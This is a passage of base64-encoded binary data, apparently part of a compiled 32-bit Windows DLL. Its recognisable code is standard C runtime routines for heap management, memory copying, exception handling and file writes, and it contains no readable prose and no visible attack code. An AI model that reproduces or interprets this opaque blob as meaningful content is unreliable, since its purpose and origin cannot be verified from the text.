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MUBAAAAUP91GP/Wi/g7+w+EqwAAAH48gf/w//9/dzSNRD8IPQAEAAB3E+ihIwAAi8Q7w3QcxwDMzAAA6xFQ6Cf2//9ZO8N0CccA3d0AAIPACIvYhdt0aY0EP1BqAFPo3Z///4PEDFdT/3UQ/3UMagH/dRj/1oXAdBH/dRRQU/91CP8VLAEBEIlF+FPoyfr//4tF+FnrdTP2OV0cdQiLB4tAFIlFHDldGHUIiweLQASJRRj/dRzoDCEAAFmD+P91BDPA60c7RRh0HlNTjU0QUf91DFD/dRjoNCEAAIvwg8QYO/N03Il1DP91FP91EP91DP91CP91HP8VKAEBEIv4O/N0B1boqJ7//1mLx41l7F9eW4tN/DPN6CmW///Jw4v/VYvsg+wQ/3UIjU3w6DSY////dSSNTfD/dSD/dRz/dRj/dRT/dRD/dQzoFv7//4PEHIB9/AB0B4tN+INhcP3Jw4v/VYvsVot1CIX2D4SBAQAA/3YE6Die////dgjoMJ7///92DOgonv///3YQ6CCe////dhToGJ7///92GOgQnv///zboCZ7///92IOgBnv///3Yk6Pmd////dijo8Z3///92LOjpnf///3Yw6OGd////djTo2Z3///92HOjRnf///3Y46Mmd////djzowZ3//4PEQP92QOi2nf///3ZE6K6d////dkjopp3///92TOienf///3ZQ6Jad////dlTojp3///92WOiGnf///3Zc6H6d////dmDodp3///92ZOhunf///3Zo6Gad////dmzoXp3///92cOhWnf///3Z06E6d////dnjoRp3///92fOg+nf//g8RA/7aAAAAA6DCd////toQAAADoJZ3///+2iAAAAOganf///7aMAAAA6A+d////tpAAAADoBJ3///+2lAAAAOj5nP///7aYAAAA6O6c////tpwAAADo45z///+2oAAAAOjYnP///7akAAAA6M2c////tqgAAADowpz//4PELF5dw4v/VYvsVot1CIX2dDWLBjsFYFoBEHQHUOifnP//WYtGBDsFZFoBEHQHUOiNnP//WYt2CDs1aFoBEHQHVuh7nP//WV5dw4v/VYvsVot1CIX2dH6LRgw7BWxaARB0B1DoWZz//1mLRhA7BXBaARB0B1DoR5z//1mLRhQ7BXRaARB0B1DoNZz//1mLRhg7BXhaA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4U45f//AoO9IOX//wB0KWoNWFCJhUDl///oFhsAAFlmO4VA5f//D4U7AwAA/4U45f///4Uw5f//i0UQOYVE5f//D4L5/f//6ScDAACLDooT/4U45f//iFQPNIsOiUQPOOkOAwAAM8mLBgPH9kAEgA+EvwIAAIuFNOX//4mNQOX//4TbD4XKAAAAiYU85f//OU0QD4YgAwAA6waLtSjl//+LjTzl//+DpUTl//8AK4005f//jYVI5f//O00QczmLlTzl////hTzl//+KEkGA+gp1EP+FMOX//8YADUD/hUTl//+IEED/hUTl//+BvUTl////EwAAcsKL2I2FSOX//yvYagCNhSzl//9QU42FSOX//1CLBv80B/8VOAEBEIXAD4RCAgAAi4Us5f//AYU45f//O8MPjDoCAACLhTzl//8rhTTl//87RRAPgkz////pIAIAAImFROX//4D7Ag+F0QAAADlNEA+GTQIAAOsGi7Uo5f//i41E5f//g6U85f//ACuNNOX//42FSOX//ztNEHNGi5VE5f//g4VE5f//Ag+3EkFBZoP6CnUWg4Uw5f//AmoNW2aJGEBAg4U85f//AoOFPOX//wJmiRBAQIG9POX///4TAABytYvYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xU4AQEQhcAPhGIBAACLhSzl//8BhTjl//87ww+MWgEAAIuFROX//yuFNOX//ztFEA+CP////+lAAQAAOU0QD4Z8AQAAi41E5f//g6U85f//ACuNNOX//2oCjYVI+f//XjtNEHM8i5VE5f//D7cSAbVE5f//A85mg/oKdQ5qDVtmiRgDxgG1POX//wG1POX//2aJEAPGgb085f//qAYAAHK/M/ZWVmhVDQAAjY3w6///UY2NSPn//yvBmSvC0fhQi8FQVmjp/QAA/xXcAAEQi9g73g+ElwAAAGoAjYUs5f//UIvDK8ZQjYQ18Ov//1CLhSjl//+LAP80B/8VOAEBEIXAdAwDtSzl//873n/L6wz/FRwAARCJhUDl//873n9ci4VE5f//K4U05f//iYU45f//O0UQD4IK////6z9qAI2NLOX//1H/dRD/tTTl////MP8VOAEBEIXAdBWLhSzl//+DpUDl//8AiYU45f//6wz/FRwAARCJhUDl//+DvTjl//8AdWyDvUDl//8AdC1qBV45tUDl//91FOijl///xwAJAAAA6KuX//+JMOs//7VA5f//6K+X//9Z6zGLtSjl//+LBvZEBwRAdA+LhTTl//+AOBp1BDPA6yToY5f//8cAHAAAAOhrl///gyAAg8j/6wyLhTjl//8rhTDl//9fW4tN/DPNXui3iP//ycNqEGhoMQEQ6HXU//+LRQiD+P51G+gvl///gyAA6BSX///HAAkAAACDyP/pnQAAADP/O8d8CDsFCHsBEHIh6AaX//+JOOjslv//xwAJAAAAV1dXV1fodJb//4PEFOvJi8jB+QWNHI0gewEQi/CD5h/B5gaLCw++TDEEg+EBdL9Q6OYVAABZiX38iwP2RDAEAXQW/3UQ/3UM/3UI6C74//+DxAyJReTrFuiJlv//xwAJAAAA6JGW//+JOINN5P/HRfz+////6AkAAACLReTo9dP//8P/dQjoMBYAAFnDi/9Vi+z/BVBmARBoABAAAOggxv//WYtNCIlBCIXAdA2DSQwIx0EYABAAAOsRg0kMBI1BFIlBCMdBGAIAAACLQQiDYQQAiQFdw4v/VYv